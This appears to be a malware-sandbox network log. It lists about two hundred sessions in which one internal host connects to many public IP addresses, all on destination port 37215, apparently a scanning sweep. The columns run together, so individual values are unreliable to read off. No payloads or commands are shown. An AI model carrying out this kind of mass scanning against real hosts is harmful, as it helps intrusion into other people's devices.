                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7626192.168.2.153896041.172.196.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7627192.168.2.1536862168.64.191.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7628192.168.2.155931441.117.94.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7629192.168.2.154254041.143.120.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7630192.168.2.1540902198.241.68.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7631192.168.2.153586841.164.129.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7632192.168.2.1546454197.122.111.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7633192.168.2.155432040.122.147.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7634192.168.2.153414841.74.190.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7635192.168.2.1533100197.98.105.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7636192.168.2.1539060157.108.27.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7637192.168.2.1551674118.113.43.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7638192.168.2.154200641.252.83.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7639192.168.2.154439241.190.20.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7640192.168.2.1534458157.247.203.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7641192.168.2.1543686157.19.184.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7642192.168.2.153368041.3.187.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7643192.168.2.1533032197.124.57.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7644192.168.2.1553476103.251.155.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7645192.168.2.15583505.247.209.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7646192.168.2.155581441.129.84.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7647192.168.2.154468041.2.32.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7648192.168.2.154787041.154.73.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7649192.168.2.1552348157.30.37.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7650192.168.2.1555332168.100.167.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7651192.168.2.1559426197.142.136.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7652192.168.2.1533478197.186.203.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7653192.168.2.1558918157.117.102.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7654192.168.2.153636041.239.23.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7655192.168.2.155773427.205.162.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7656192.168.2.153987441.160.132.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7657192.168.2.1551694157.250.244.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7658192.168.2.153675085.25.97.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7659192.168.2.1560080157.214.119.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7660192.168.2.1554332157.185.78.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7661192.168.2.1555094197.244.57.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7662192.168.2.153452241.243.2.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7663192.168.2.1548964122.166.140.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7664192.168.2.155697447.28.206.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7665192.168.2.1555052157.11.15.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7666192.168.2.1552688157.118.40.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7667192.168.2.1538940197.253.188.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7668192.168.2.154958641.234.16.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7669192.168.2.1555396157.24.238.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7670192.168.2.155916841.159.90.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7671192.168.2.15435764.235.191.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7672192.168.2.1556964197.9.137.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7673192.168.2.1547228157.201.170.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7674192.168.2.1549740197.59.192.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7675192.168.2.154568841.13.32.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7676192.168.2.1540668157.54.232.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7677192.168.2.1548190217.244.34.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7678192.168.2.1542038157.120.182.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7679192.168.2.1545968197.239.25.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7680192.168.2.155965441.181.99.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7681192.168.2.1537602157.229.32.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7682192.168.2.1543278197.177.87.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7683192.168.2.1556462197.31.74.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7684192.168.2.153494648.241.157.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7685192.168.2.1553422197.165.237.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7686192.168.2.1536876197.167.43.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7687192.168.2.155798441.4.142.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7688192.168.2.1555936174.109.251.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7689192.168.2.153284085.227.238.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7690192.168.2.1553192197.172.110.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7691192.168.2.1538100197.193.81.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7692192.168.2.1549196157.42.18.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7693192.168.2.1552316157.40.223.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7694192.168.2.1560886123.218.7.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7695192.168.2.1550772157.224.192.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7696192.168.2.1536034197.188.236.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7697192.168.2.1547886157.68.128.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7698192.168.2.154557278.76.125.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7699192.168.2.153374841.230.255.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7700192.168.2.155192260.164.128.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7701192.168.2.156030041.9.57.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7702192.168.2.153932286.167.190.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7703192.168.2.1540048197.126.53.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7704192.168.2.1547166197.147.137.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7705192.168.2.154336841.13.182.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7706192.168.2.154895436.221.193.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7707192.168.2.155718241.211.160.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7708192.168.2.153823841.64.83.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7709192.168.2.153787041.154.170.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7710192.168.2.1547748197.101.163.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7711192.168.2.154921641.189.152.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7712192.168.2.154999241.22.59.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7713192.168.2.1545450197.123.71.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7714192.168.2.1545830197.52.55.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7715192.168.2.1555750197.74.235.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7716192.168.2.1555204157.199.246.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7717192.168.2.153680471.188.246.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7718192.168.2.154282041.46.30.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7719192.168.2.1543616197.137.178.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7720192.168.2.1534026197.12.52.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7721192.168.2.153462041.166.229.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7722192.168.2.154100441.146.166.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7723192.168.2.1550496157.26.114.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7724192.168.2.1554242157.225.168.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7725192.168.2.1558386197.91.189.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7726192.168.2.1542468197.229.101.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7727192.168.2.154790041.243.52.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7728192.168.2.1548116157.51.218.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7729192.168.2.1546388176.97.75.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7730192.168.2.154555641.71.227.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7731192.168.2.155833841.6.39.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7732192.168.2.1550136197.107.233.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7733192.168.2.1549584197.141.188.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7734192.168.2.153526058.54.78.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7735192.168.2.153540841.157.201.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7736192.168.2.1543564197.76.179.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7737192.168.2.15390364.52.221.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7738192.168.2.154366641.79.43.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7739192.168.2.1533252157.237.5.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7740192.168.2.153289668.26.214.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7741192.168.2.1557262157.219.20.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7742192.168.2.1534284209.176.191.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7743192.168.2.1556758157.16.244.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7744192.168.2.1538252157.234.76.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7745192.168.2.154301641.85.210.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7746192.168.2.1554090197.242.80.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7747192.168.2.1545148157.184.252.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7748192.168.2.1538038157.170.73.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7749192.168.2.1535002197.43.208.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7750192.168.2.154750841.242.244.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7751192.168.2.1542678161.235.99.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7752192.168.2.1536910129.1.120.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7753192.168.2.1535574157.44.97.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7754192.168.2.155966259.37.199.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7755192.168.2.1555410157.223.71.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7756192.168.2.156096641.107.239.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7757192.168.2.154124441.140.15.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7758192.168.2.1556478216.114.161.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7759192.168.2.1533224157.167.110.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7760192.168.2.1536890157.200.243.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7761192.168.2.155441641.3.156.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7762192.168.2.1535442139.132.104.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7763192.168.2.15360988.212.132.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7764192.168.2.1547760197.5.130.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7765192.168.2.1545674157.199.107.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7766192.168.2.1535996157.158.65.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7767192.168.2.1543938197.200.30.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7768192.168.2.1553554157.127.164.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7769192.168.2.1535456197.174.224.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7770192.168.2.154672241.20.250.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7771192.168.2.1541484183.186.115.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7772192.168.2.155308641.67.75.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7773192.168.2.1560002197.76.131.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7774192.168.2.155939241.83.104.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7775192.168.2.156097641.238.107.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7776192.168.2.155819041.40.93.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7777192.168.2.1535854134.45.126.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7778192.168.2.154987241.199.12.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7779192.168.2.155305075.186.152.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7780192.168.2.1559910197.54.170.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7781192.168.2.1537326197.138.251.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7782192.168.2.1551590104.147.6.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7783192.168.2.1536102157.187.109.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7784192.168.2.1555690192.120.208.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7785192.168.2.1559988157.130.53.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7786192.168.2.1543166197.252.153.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7787192.168.2.156008819.4.117.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7788192.168.2.155530213.109.75.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7789192.168.2.1533798197.151.166.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7790192.168.2.1553004157.203.205.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7791192.168.2.1538724168.62.62.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7792192.168.2.1549200110.24.219.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7793192.168.2.155843641.59.88.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7794192.168.2.1536874202.89.93.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7795192.168.2.1533624157.57.134.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7796192.168.2.154356847.29.161.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7797192.168.2.153521041.131.236.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7798192.168.2.153776841.108.208.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7799192.168.2.154762641.236.130.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7800192.168.2.1546054197.138.172.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7801192.168.2.1549946197.68.156.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7802192.168.2.1532794157.255.238.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7803192.168.2.154763841.195.106.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7804192.168.2.1541098197.234.104.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7805192.168.2.1539566158.251.239.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7806192.168.2.154667841.127.69.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7807192.168.2.153959841.107.121.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7808192.168.2.155681241.193.115.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7809192.168.2.1549562157.99.207.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7810192.168.2.1546290197.200.71.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7811192.168.2.1551704197.110.67.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7812192.168.2.155107847.37.210.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7813192.168.2.1538192132.36.171.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7814192.168.2.1538832197.138.126.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7815192.168.2.1536660134.42.163.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7816192.168.2.1554130157.210.55.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7817192.168.2.1560036197.138.119.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7818192.168.2.1559586197.102.157.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7819192.168.2.153408841.193.105.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7820192.168.2.1539500157.81.55.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7821192.168.2.1534178197.124.57.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7822192.168.2.1560500157.31.23.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7823192.168.2.1550818157.209.91.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7824192.168.2.155248641.120.103.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7825192.168.2.154233641.233.87.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7826192.168.2.1534492197.96.82.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7827192.168.2.154359262.70.69.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7828192.168.2.155976241.172.195.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7829192.168.2.154946841.219.121.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7830192.168.2.1545678157.249.28.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7831192.168.2.1555156197.49.122.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7832192.168.2.1553878157.118.27.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7833192.168.2.155384241.189.15.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7834192.168.2.154675241.9.132.3937215
                                                          TimestampBytes transferredDirectionData


